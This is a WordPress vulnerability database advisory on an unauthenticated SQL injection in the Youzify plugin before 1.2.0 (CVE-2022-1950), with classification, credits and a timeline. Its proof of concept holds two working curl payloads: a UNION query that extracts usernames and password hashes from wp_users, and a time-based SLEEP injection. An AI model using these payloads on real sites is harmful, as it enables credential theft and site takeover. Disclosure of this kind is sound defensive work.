WordPress Plugin Vulnerabilities

Youzify < 1.2.0 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' \
    --data "action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=1 UNION ALL SELECT (SELECT CONCAT(user_login,CHAR(0x3a),user_pass) from wp_users),2,3,4-- -"

time curl 'https://example.com/wp-admin/admin-ajax.php' \
    --data "action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=(SELECT 7958 FROM (SELECT(SLEEP(5)))XVfJ)"

Affects Plugins

Plugin icon
youzify
Fixed in 1.2.0

References

CVE
CVE-2022-1950

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
4352283f-dd43-4827-b417-0c55d0f4637d

Timeline

Publicly Published
2022-07-11 (about 1 years ago)
Added
2022-07-11 (about 1 years ago)
Last Updated
2023-04-11 (about 7 months ago)

Other

Published
Title
Published
2022-03-23
Title
Daily Prayer Time < 2022.03.01 - Unauthenticated SQLi
Published
2020-08-22
Title
RSVPMaker < 7.8.2 - Unauthenticated SQL Injection
Published
2014-08-01
Title
WP Forum Server <= 1.7.3 - wpf-insert.php edit_post_id Parameter SQL Injection
Published
2022-02-16
Title
WP Statistics < 13.1.6 - Unauthenticated Blind SQL Injection via current_page_type
Published
2014-08-01
Title
WP eCommerce 3.8.9 - SQL Injection